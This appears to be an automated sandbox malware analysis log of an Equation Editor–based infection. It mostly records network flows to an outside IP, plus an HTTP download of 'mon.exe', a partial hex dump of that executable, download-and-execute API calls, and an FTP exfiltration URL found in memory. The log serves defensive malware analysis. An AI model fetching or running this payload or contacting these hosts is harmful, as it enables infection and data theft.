                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 08 Aug 2022 15:26:50 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.0.19Last-Modified: Mon, 08 Aug 2022 13:26:41 GMTETag: "dae00-5e5bac4276722"Accept-Ranges: bytesContent-Length: 896512Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0d 0f f1 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a6 0d 00 00 06 00 00 00 00 00 00 2e c5 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 c4 0d 00 53 00 00 00 00 e0 0d 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a5 0d 00 00 20 00 00 00 a6 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 03 00 00 00 e0 0d 00 00 04 00 00 00 a8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 ac 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c5 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 08 d2 0c 00 d0 f2 00 00 03 00 00 00 b7 00 00 06 28 b0 00 00 e0 21 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 01 00 00 00 01 00 00 11 2a 00 00 00 13 30 07 00 d8 00 00 00 01 00 00 11 02 19 8d 4b 00 00 01 25 16 72 01 00 00 70 a2 25 17 72 4b 00 00 70 a2 25 18 72 59 00 00 70 a2 7d 02 00 00 04 02 14 7d 03 00 00 04 02 28 16 00 00 0a 20 03 6d 2f 17 20 e3 d6 7e 66 61 25 0a 1c 5e 45 06 00 00 00 19 00 00 00 35 00 00 00 02 00 00 00 64 00 00 00 d4 ff ff ff 45 00 00 00 2b 62 00 00 02 28 13 00 00 06 06 20 7e a4 05 de 5a 20 b0 66 13 3d 61 2b c0 02 7b 0f 00 00 04 1b 28 19 00 00 06 00 06 20 90 2c 64 b5 5a 20 cc df a4 7b 61 2b a4 00 06 20 99 ca 63 a7 5a 20 26 cf 38 56 61 2b 94 00 02 7b 19 00 00 04 1b 28 19 00 00 06 06 20 aa 93 e2 7a 5a 20 10 37 37 e8 61 38 75 ff ff ff 7e 04 00 00 04 74 03 00 00 01 02 7b 02 00 00 04 28 1a 00 00 06 26 2a 13 30 03 00 3a 00 00 00 01 00 00 11 00 20 92 ef 9c 68 20 91 b6 de 3e 61 25 0a 19 5e 45 03 00 00 00 e0 ff ff ff 02 00 00 00 17 00 00 00 2b 15 02 28 08 00 0
                Source: global trafficHTTP traffic detected: GET /mon/mon.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.89.152Connection: Keep-Alive
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_033F0517 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.152
                Source: EQNEDT32.EXE, 00000002.00000002.980461648.00000000005E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                Source: EQNEDT32.EXE, 00000002.00000002.980461648.00000000005E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ftp://ftp.alonsorojasmudanzasnacionales.com/okok
                Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: EQNEDT32.EXE, 00000002.00000002.980927882.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.980231565.000000000055F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.12.89.152/mon/mon.exe
